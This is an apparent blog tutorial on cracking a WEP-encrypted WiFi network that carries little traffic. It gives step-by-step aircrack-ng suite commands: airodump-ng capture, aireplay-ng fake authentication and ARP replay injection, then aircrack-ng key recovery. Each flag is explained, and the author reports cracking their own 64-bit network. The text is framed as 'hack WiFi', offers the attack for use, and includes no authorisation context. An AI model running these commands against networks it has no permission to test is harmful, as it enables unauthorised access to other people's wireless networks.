Hack WEP WiFi Network using ARP Replay Attack (Idle Network)

If the network is idle or very few packets or no packets are injecting in the network then WEP WiFi Network Hack will not work. Now we are using ARP Replay Attack, which will even hack the idle network by associating and injecting new packets into the network.

For this tutorial, my wireless interface card is wlan1 because my previous wireless interface was not strong enough to capture the packets. Now i am using different wireless adapter which is wlan1.

Steps to Hack WiFi using ARP Replay

  1. Enable Monitor Mode of Wireless Interface Card.
  2. Capture Packets using airodump-ng in Kali Linux against your target network.
    airodump-ng --bssid 62:23:6A:96:69:73 --channel 11 --write fakeattack wlan1
  3. Associate with the target network using aireplay-ng.

     aireplay-ng --fakeauth 0 -a 62:23:6A:96:69:73 -h 00:C0:CA:98:29:F3 wlan1
  4. Force the router to generate new packets with new IVs.
    aireplay-ng --arpreplay -b 62:23:6A:96:69:73 -h 00:C0:CA:98:29:F3 wlan1

    In aireplay-ng command:

    • –arpreplay is the name of attack
    • -b 62:23:6A:96:69:73 is the MAC address of my target network
    • -h 00:C0:CA:98:29:F3 is the MAC address of my wireless interface card
    • wlan1 is the wireless adapter in monitor mode

    As we are associated with the target network. Now we can force the router to generate new packets with new IVs. This will increase the data very fast and allow us to crack WEP network very fast.

    Aireplay-ng Arpreplay Attack Command

    Getting ARP Requests

    In this attack, my wireless adapter is waiting for ARP packet. Once we have the ARP packet, we capture it and re-transmit it. This will force the router to generate new packet with new IV. This process continue and router keep generating the new packets with new IVs.

  5. Once we have enough data packets, we will crack the network using aircrack-ng

    aircrack-ng fakeattack-01.cap

    File Cracked using Aircrack-ng

    My network is cracked, once i have 12846 IVs. I am using 64 bit WEP encryption. If you have 128 bit WEP encryption then it will take more time in your case.

Leave a Reply

Your email address will not be published. Required fields are marked *